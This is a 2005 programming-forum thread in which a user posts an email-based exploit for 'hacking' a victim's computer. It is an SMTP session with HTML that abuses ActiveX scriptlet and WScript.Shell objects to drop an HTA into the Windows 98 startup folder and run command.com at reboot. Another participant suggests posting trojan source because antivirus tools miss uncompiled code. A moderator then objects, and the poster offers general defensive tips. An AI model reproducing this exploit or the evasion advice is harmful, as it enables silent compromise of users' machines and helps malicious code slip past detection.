Security tricks

Printable View

July 30th, 2005, 03:15 PM
Skoons

Security tricks

In this thread we will talk about viruses computer security and cryptography. As I said yesterday I put some tricks how to hack victims computer.
To make some computer download and launch some files we may use e-mail with necessary commands of SMTP , also we may with help of those commands launch some ActiveX components on our victims computer. This code and information was taken from www.guinski.com/scrtlb-desc.html

Code:

helo somedomain.com mail from: [email protected] rcpt to: [email protected] data subject: You need to Read this MIME-version 1.0 Content-Type: text/html; charset=us-ascii Content-Tranfer-Encoding: 7bit If You have received this message in error please delete it;) <object id=”scr” classid=”clsid:06290BD5-48AA-11D2-8432-006008C3FBFC”> </object> <SCRIPT> scr.Reset(); scr.Path=”C:\\WIN98\\start menu\\programs\\startup\\attack.hta”; scr.Doc=”<object id=’wsh’ classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B’> </object> <SCRIPT> alert(‘Your security was destroyed’);wsh.Run(‘C:\\WIN98\\command.com’); </”+”SCRIPT>”; scr.write(); </SCRIPT> </object> . quit

So with help of this thing, when our victim opens our mail in his Outlook Express, file with some scenario is placed to his computer, and when he reboot system he will got troubles .
July 30th, 2005, 03:27 PM
bijuabrahamp

1 Attachment(s)

Re: Security tricks

But the problem is that my McAfee will even alert me if this thing comes in my browser!!!!! - it tries to clean the cache! :(

Screenshot attached

EDIT : TO be more clear, that alert came while I was viewing this thread!
July 30th, 2005, 04:05 PM
Skoons

Re: Security tricks

Quote:

Originally Posted by bijuabrahamp

But the problem is that my McAfee will even alert me if this thing comes in my browser!!!!! - it tries to clean the cache! :(

Screenshot attached

EDIT : TO be more clear, that alert came while I was viewing this thread!

hmm, Need to think about this. But this trick is old enough so AntiVirus software detect it.
July 30th, 2005, 04:14 PM
bijuabrahamp

1 Attachment(s)

Re: Security tricks

Quote:

Originally Posted by Skoons

hmm, Need to think about this. But this trick is old enough so AntiVirus software detect it.

Yeah.. I think you are right

McAfee disabled... causing too much problem when i read this thread ;)
July 30th, 2005, 04:43 PM
Skoons

Re: Security tricks

Quote:

Originally Posted by bijuabrahamp

Yeah.. I think you are right

McAfee disabled... causing too much problem when i read this thread ;)

Need to talk with CG admins, about some tags which will completly block unsafe code. But this script is safe enough, because it`s targeting Windows98 and shows only one message that security was broken it illustrates some principles of hacking attacks

P.S.
Few minutes ago my computer was attacked by some trojan aplication
July 30th, 2005, 04:47 PM
bijuabrahamp

Re: Security tricks

Quote:

Originally Posted by Skoons

Few minutes ago my computer was attacked by some trojan aplication

Oh.. don't go in search of how to make trojans because the same websites which teach u to make can infect ur computer also :cool:
July 30th, 2005, 04:56 PM
Skoons

Re: Security tricks

Quote:

Originally Posted by bijuabrahamp

Oh.. don't go in search of how to make trojans because the same websites which teach u to make can infect ur computer also :cool:

I don`t. I just do nothing everything was perfect, but then my firewall sends me huge number of warnings. I have block this trojans, hmm, interesting what will be with browsers if i will post trojan code :D
July 30th, 2005, 05:02 PM
bijuabrahamp

Re: Security tricks

Quote:

Originally Posted by Skoons

I don`t. I just do nothing everything was perfect, but then my firewall sends me huge number of warnings. I have block this trojans, hmm, interesting what will be with browsers if i will post trojan code :D

Well.. if ur trojan code is not a script, then post it.. antiviruses cannot recognize uncompiled source code (except scripts)
July 31st, 2005, 12:22 AM
bijuabrahamp

Re: Security tricks

Oh.. that virus was a pretty nice one.. wasn't it? It was capturing the news headlines for a period of time.
But, I think its better if we talk about the exploits that haven't been found - more fun ;)
July 31st, 2005, 10:28 AM
Gabriel Fleseriu

Re: Security tricks

People, I have to remind you that posting code for viruses and the like is forbidden here on CodeGuru. Please refrain from such posting in future.

It is ok to talk about security which of course means that you have to know where the holes are and how an attack works. The final goal of the discussion must however be to find ways for defense and not to find ways to attack.

Posting virus code is thus beyond the acceptable line IMO.
July 31st, 2005, 03:05 PM
Skoons

Re: Security tricks

Well, About protection, as you see ActiveX components may cause big danger to your computer. And there are some bad news, you may protect yourself only for some time, with new security updates from Microsoft, and putting your security preferences into high level. But if you think that some other systems are more safe, you are wrong, there are some tricks in windows X systems which may you get screenshots from the remoted computer. About Worms, The best idea is to put all preferences in your browser to high security, and from my own experience, I can tell, that most of all script attacks works very good on IE, and worther on Opera. But it`s only a suggestion. And another part of security problem all hacking attacks including viruse attacks, are used by some people to get your vital information or cause some malfunctions in your important software. To protect your vital information the best idea is to cypher it. About some cypher algorythms I willl post lille bit farther, I need to translate them into English.

P.S. Sorry for posting viruses code, I was very excited with this problem and have forget CG rules. :o